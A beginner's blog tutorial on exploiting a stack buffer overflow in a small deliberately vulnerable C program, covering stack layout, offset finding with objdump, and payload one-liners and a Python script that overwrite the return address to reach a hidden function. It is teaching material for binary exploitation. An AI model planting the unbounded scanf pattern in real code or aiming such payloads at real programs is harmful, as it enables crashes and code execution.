Apr 3, 2015 • Dhaval Kapil
I am interested in exploiting binary files. The first time I came across the buffer overflow exploit, I couldn’t actually implement it. Many of the existing sources on the web were outdated (they worked with earlier versions of gcc, Linux, etc.). It took me quite a while to actually run a vulnerable program on my machine and exploit it.
I decided to write a simple tutorial for beginners or people who have just entered the field of binary exploits.
This tutorial will be very basic. We will simply exploit the buffer by smashing the stack and modifying the return address of the function. This will be used to call some other function. You can also use the same technique to point the return address to some custom code that you have written, thereby executing anything you want (perhaps I will write another blog post regarding shellcode injection).
- I assume readers have basic to intermediate knowledge of C.
- They should be a little familiar with gcc and the Linux command line.
- They should know basic x86 assembly language.
This tutorial is specifically written to work on the latest Linux distros. It might work on older versions. The same goes for gcc. We are going to create a 32 bit binary, so it will work on both 32 and 64 bit systems.
#include <stdio.h>

void secretFunction()
{
    printf("Congratulations!\n");
    printf("You have entered in the secret function!\n");
}

void echo()
{
    char buffer[20];

    printf("Enter some text:\n");
    scanf("%s", buffer);
    printf("You entered: %s\n", buffer);
}

int main()
{
    echo();

    return 0;
}
Now this program looks quite safe to the usual programmer. But in fact we can call secretFunction just by modifying the input. There are better ways to do this if the binary is local: we can use gdb to modify %eip. But in case the binary is running as a service on some other machine, we can make it call other functions or even custom code by just modifying the input.
Let’s start by first examining the memory layout of a C program, especially the stack, its contents and how it works during function calls and returns. We will also go into the machine registers esp, ebp, etc.
Source: http://i.stack.imgur.com/1Yz9K.gif
- Command line arguments and environment variables: The arguments passed to a program before running and the environment variables are stored in this section.
- Stack: This is the place where all the function parameters, return addresses and the local variables of the function are stored. It’s a LIFO structure. It grows downward in memory (from higher address space to lower address space) as new function calls are made. We will examine the stack in more detail later.
- Heap: All the dynamically allocated memory resides here. Whenever we use malloc to get memory dynamically, it is allocated from the heap. The heap grows upwards in memory (from lower to higher memory addresses) as more and more memory is required.
- Uninitialized data (Bss Segment): All the uninitialized data is stored here. This consists of all global and static variables which are not initialized by the programmer. The kernel initializes them to arithmetic 0 by default.
- Initialized data (Data Segment): All the initialized data is stored here. This consists of all global and static variables which are initialized by the programmer.
- Text: This is the section where the executable code is stored. The loader loads instructions from here and executes them. It is often read only.
The registers we will use are:
- %eip: The instruction pointer register. It stores the address of the next instruction to be executed. After every instruction execution its value is incremented depending upon the size of the instruction.
- %esp: The stack pointer register. It stores the address of the top of the stack. This is the address of the last element on the stack. The stack grows downward in memory (from higher address values to lower address values), so %esp points to the value in the stack at the lowest memory address.
- %ebp: The base pointer register. The %ebp register is usually set to %esp at the start of the function. This is done to keep track of function parameters and local variables. Local variables are accessed by subtracting offsets from %ebp and function parameters are accessed by adding offsets to it, as you shall see in the next section.
Consider the following piece of code:
void func(int a, int b)
{
    int c;
    int d;
    // some code
}

void main()
{
    func(1, 2);
    // next instruction
}
Assume our %eip is pointing to the func call in main. The following steps would be taken:
- A function call is found, so push the parameters on the stack from right to left (in reverse order). So 2 will be pushed first and then 1.
- We need to know where to return after func is completed, so push the address of the next instruction on the stack.
- Find the address of func and set %eip to that value. The control has been transferred to func().
- As we are in a new function we need to update %ebp. Before updating we save it on the stack so that we can return later back to main. So %ebp is pushed on the stack.
- Set %ebp to be equal to %esp. %ebp now points to the current stack pointer.
- Push local variables onto the stack/reserve space for them on the stack. %esp will be changed in this step.
- After func gets over we need to reset the previous stack frame. So set %esp back to %ebp. Then pop the earlier %ebp from the stack and store it back in %ebp. So the base pointer register points back to where it pointed in main.
- Pop the return address from the stack and set %eip to it. The control flow comes back to main, just after the func function call.
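The steps above can be traced with a small model. The following is only a sketch in Python 3, not real machine behaviour: the ToyStack class, the call and ret helpers and all the addresses are made up for illustration, and every stack slot is assumed to be 4 bytes wide.

```python
class ToyStack:
    """Toy model of a 32-bit x86 stack: 4-byte slots, growing toward lower addresses."""

    def __init__(self, esp, ebp):
        self.esp = esp    # stack pointer
        self.ebp = ebp    # base pointer
        self.eip = None   # instruction pointer (only tracked across call/return)
        self.mem = {}     # address -> 32-bit value

    def push(self, value):
        self.esp -= 4
        self.mem[self.esp] = value

    def pop(self):
        value = self.mem[self.esp]
        self.esp += 4
        return value


def call(m, func_addr, return_addr, args, n_locals):
    """The first six steps: everything up to the point where func's body runs."""
    for arg in reversed(args):   # parameters, right to left
        m.push(arg)
    m.push(return_addr)          # address of the next instruction in main
    m.eip = func_addr            # control transfers to func
    m.push(m.ebp)                # save main's base pointer
    m.ebp = m.esp                # the new frame starts here
    m.esp -= 4 * n_locals        # reserve space for the local variables


def ret(m):
    """The last two steps: tear the frame down and return to the caller."""
    m.esp = m.ebp                # discard the locals
    m.ebp = m.pop()              # restore main's base pointer
    m.eip = m.pop()              # jump back to the saved return address


if __name__ == "__main__":
    # Hypothetical addresses, chosen only to make the output readable.
    m = ToyStack(esp=0xBFFFF000, ebp=0xBFFFF020)
    call(m, func_addr=0x08048400, return_addr=0x08048450, args=[1, 2], n_locals=2)
    print("a   =", m.mem[m.ebp + 8])
    print("b   =", m.mem[m.ebp + 12])
    print("ret =", hex(m.mem[m.ebp + 4]))
    ret(m)
    print("eip =", hex(m.eip), "ebp =", hex(m.ebp))
```

Inside func the return address sits at %ebp+4 and the parameters at %ebp+8 and %ebp+12, which is why overwriting the bytes just above the saved %ebp changes where the function returns to.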
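This is how the stack would look while in func, from higher to lower addresses: the parameters 2 and 1, the return address, the saved %ebp (where %ebp now points), and then the space for the local variables c and d.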
Buffer overflow is a vulnerability in low level code written in C and C++. An attacker can cause the program to crash, corrupt data, steal private information or run their own code.
It basically means accessing a buffer outside of its allotted memory space. This happens quite frequently in the case of arrays. As variables are stored together in the stack, the heap, etc., accessing an out-of-bounds index can read or write the bytes of some other variable. Normally the program would crash, but we can skillfully craft input that makes vulnerable code perform any of the above mentioned attacks. Here we shall modify the return address so that the program executes the code at an address of our choosing.
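To see why an out-of-bounds write corrupts a neighbouring variable, here is a toy model in Python 3. It is a sketch under simplifying assumptions: "memory" is a 12-byte bytearray holding an 8-byte buffer followed by a 4-byte neighbour, the helper names are invented for this example, and the terminating null byte that C would also write is ignored.

```python
BUFFER_START = 0
BUFFER_SIZE = 8


def make_memory():
    """12 bytes of toy memory: an 8-byte buffer followed by a 4-byte neighbour."""
    memory = bytearray(12)
    memory[8:12] = b"SAFE"
    return memory


def unchecked_copy(memory, data):
    """Copy the way an unbounded scanf("%s") or strcpy would: no length check."""
    for i, byte in enumerate(data):
        memory[BUFFER_START + i] = byte


def checked_copy(memory, data):
    """Copy at most BUFFER_SIZE bytes, so the neighbour is never touched."""
    unchecked_copy(memory, data[:BUFFER_SIZE])


if __name__ == "__main__":
    data = b"AAAAAAAAXXXX"  # 12 bytes for an 8-byte buffer

    memory = make_memory()
    unchecked_copy(memory, data)
    print(bytes(memory[8:12]))  # the neighbour now holds the attacker's bytes

    memory = make_memory()
    checked_copy(memory, data)
    print(bytes(memory[8:12]))  # the neighbour is intact
```

In the real program the "neighbour" is the saved %ebp and the return address, which is what makes the overflow exploitable rather than just a bug.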
Save the above mentioned code as vuln.c. Let’s compile it.
For 32 bit systems
gcc vuln.c -o vuln -fno-stack-protector
For 64 bit systems
gcc vuln.c -o vuln -fno-stack-protector -m32
-fno-stack-protector disables the stack protection, so smashing the stack is now allowed. -m32 makes sure that the compiled binary is 32 bit. You may need to install some additional libraries to compile 32 bit binaries on 64 bit machines. You can download the binary generated on my machine here.
You can now run it using ./vuln.
Enter some text:
HackIt!
You entered: HackIt!
Let’s begin to exploit the binary. First of all we would like to see the disassembly of the binary. For that we’ll use objdump:
objdump -d vuln
Running this we would get the entire disassembly. Let’s focus on the parts that we are interested in. (Note however that your output may vary.)
- The address of secretFunction is 0804849d in hex.
  0804849d <secretFunction>:
- 38 in hex or 56 in decimal bytes are reserved for the local variables of the echo function.
  80484c0: 83 ec 38 sub $0x38,%esp
- The address of buffer starts 1c in hex or 28 in decimal bytes before %ebp. This means that 28 bytes are reserved for buffer even though we asked for 20 bytes.
  80484cf: 8d 45 e4 lea -0x1c(%ebp),%eax
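Since your output may vary, it can help to pull these numbers out of the disassembly mechanically instead of converting hex by hand. The following Python 3 sketch does that for the two instruction forms quoted above; the function names are my own, and the regular expressions are only assumed to match lines formatted like these two.

```python
import re


def stack_reservation(line):
    """Bytes reserved by a `sub $0xNN,%esp` instruction, or None if absent."""
    match = re.search(r"sub\s+\$0x([0-9a-f]+),%esp", line)
    return int(match.group(1), 16) if match else None


def offset_below_ebp(line):
    """Distance below %ebp in a `lea -0xNN(%ebp),...` instruction, or None."""
    match = re.search(r"lea\s+-0x([0-9a-f]+)\(%ebp\)", line)
    return int(match.group(1), 16) if match else None


if __name__ == "__main__":
    print(stack_reservation("80484c0: 83 ec 38 sub $0x38,%esp"))       # 56
    print(offset_below_ebp("80484cf: 8d 45 e4 lea -0x1c(%ebp),%eax"))  # 28
```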
Now we know that 28 bytes are reserved for buffer, and it is right next to the saved %ebp (the base pointer of the main function). Hence the next 4 bytes will store that %ebp and the next 4 bytes will store the return address (the address that %eip is going to jump to after it completes the function). Now it is pretty obvious what our payload would look like. The first 28+4=32 bytes would be any random characters and the next 4 bytes will be the address of secretFunction.
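The arithmetic can be checked against a toy copy of echo's frame. This is a sketch in Python 3 that assumes the layout described above (28 bytes of buffer, 4 bytes of saved %ebp, 4 bytes of return address, nothing in between); the names are invented for the example, and on your machine the offset may differ.

```python
BUFFER_OFFSET = 0x1C   # buffer starts 28 bytes below %ebp (from the lea instruction)
SAVED_EBP_SIZE = 4     # the saved %ebp sits directly above the buffer
RETURN_ADDR_SIZE = 4   # the return address sits directly above the saved %ebp


def padding_length():
    """Number of bytes to write before reaching the return address."""
    return BUFFER_OFFSET + SAVED_EBP_SIZE


def overwrite_frame(data):
    """Copy data into a toy frame laid out as [buffer | saved ebp | return address]."""
    frame = bytearray(BUFFER_OFFSET + SAVED_EBP_SIZE + RETURN_ADDR_SIZE)
    frame[:len(data)] = data
    return frame


def return_address(frame):
    """Read the return-address slot as a little-endian 32-bit integer."""
    start = padding_length()
    return int.from_bytes(frame[start:start + RETURN_ADDR_SIZE], "little")


if __name__ == "__main__":
    payload = b"a" * padding_length() + b"\x9d\x84\x04\x08"
    print(padding_length())                               # 32
    print(hex(return_address(overwrite_frame(payload))))  # 0x804849d
```

A short input such as HackIt! never reaches the last four bytes, so the return address stays untouched. Only input longer than 32 bytes changes it.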
Note: Registers are 4 bytes or 32 bits as the binary is compiled for a 32 bit system.
The address of secretFunction is 0804849d in hex. Now depending on whether our machine is little-endian or big-endian we need to decide the proper format of the address to be put. For a little-endian machine (x86 is little-endian) we need to put the bytes in the reverse order, i.e. 9d 84 04 08. The following scripts generate such payloads on the terminal. Use whichever language you prefer:
ruby -e 'print "a"*32 + "\x9d\x84\x04\x08"'
python -c 'print "a"*32 + "\x9d\x84\x04\x08"'
perl -e 'print "a"x32 . "\x9d\x84\x04\x08"'
php -r 'echo str_repeat("a",32) . "\x9d\x84\x04\x08";'
Note: \x9d is the escape sequence for the single byte whose value is 9d in hex.
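If reversing the bytes by hand feels error-prone, the standard struct module can do it. A minimal Python 3 sketch follows; pack_address is a name I made up, and the address is the one from my objdump output, so substitute your own.

```python
import struct


def pack_address(address, little_endian=True):
    """Pack a 32-bit address into 4 bytes in the requested byte order."""
    fmt = "<I" if little_endian else ">I"
    return struct.pack(fmt, address)


if __name__ == "__main__":
    address = 0x0804849D
    print(pack_address(address).hex())                       # 9d840408
    print(pack_address(address, little_endian=False).hex())  # 0804849d
```

The little-endian result is exactly the 9d 84 04 08 sequence used in the one-liners.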
You can pipe this payload directly into the vuln binary.
ruby -e 'print "a"*32 + "\x9d\x84\x04\x08"' | ./vuln
python -c 'print "a"*32 + "\x9d\x84\x04\x08"' | ./vuln
perl -e 'print "a"x32 . "\x9d\x84\x04\x08"' | ./vuln
php -r 'echo str_repeat("a",32) . "\x9d\x84\x04\x08";' | ./vuln
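The python one-liner above uses the Python 2 print statement. Under Python 3 it is a syntax error, and print() would also encode \x9d as the two UTF-8 bytes c2 9d, which corrupts the address. Here is a sketch of a Python 3 equivalent that writes raw bytes instead. The file name payload.py and the command-line convention are assumptions of mine, and the padding of 32 comes from the layout worked out earlier.

```python
import sys


def build_payload(target, padding=32, filler=b"a"):
    """`padding` filler bytes followed by `target` as a little-endian 32-bit address."""
    return filler * padding + target.to_bytes(4, "little")


# Usage (hypothetical file name): python3 payload.py 0804849d | ./vuln
# Without an address argument the script does nothing.
if __name__ == "__main__" and len(sys.argv) == 2:
    target = int(sys.argv[1], 16)
    # sys.stdout.buffer accepts bytes, so nothing gets re-encoded on the way out.
    sys.stdout.buffer.write(build_payload(target) + b"\n")
```

Taking the address as an argument keeps the script usable when your disassembly shows a different address for secretFunction. One caveat: scanf("%s") stops reading at whitespace, so an address containing a byte such as 0x0a or 0x20 would be cut short.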
This is the output that I get:
Enter some text:
You entered: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<rubbish 3 bytes>
Congratulations!
You have entered in the secret function!
Illegal instruction (core dumped)
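Cool! We were able to overflow the buffer and modify the return address, and secretFunction got called. But this did foul up the stack: secretFunction was entered through a return instead of a proper call, so no valid return address was waiting for it on the stack, and the program crashed once it finished.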
The following C functions are vulnerable to this when used without a length limit:
- gets
- scanf
- sprintf
- strcpy
Whenever you are using buffers, be careful about their maximum length. Handle them appropriately.
While managing BackdoorCTF I devised a simple challenge based on this vulnerability. See if you can solve it!